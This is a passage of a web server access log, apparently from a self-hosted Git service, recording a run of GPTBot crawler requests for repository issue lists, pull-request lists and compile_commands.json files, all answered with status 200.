compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:18:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:18:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:18:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:18:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 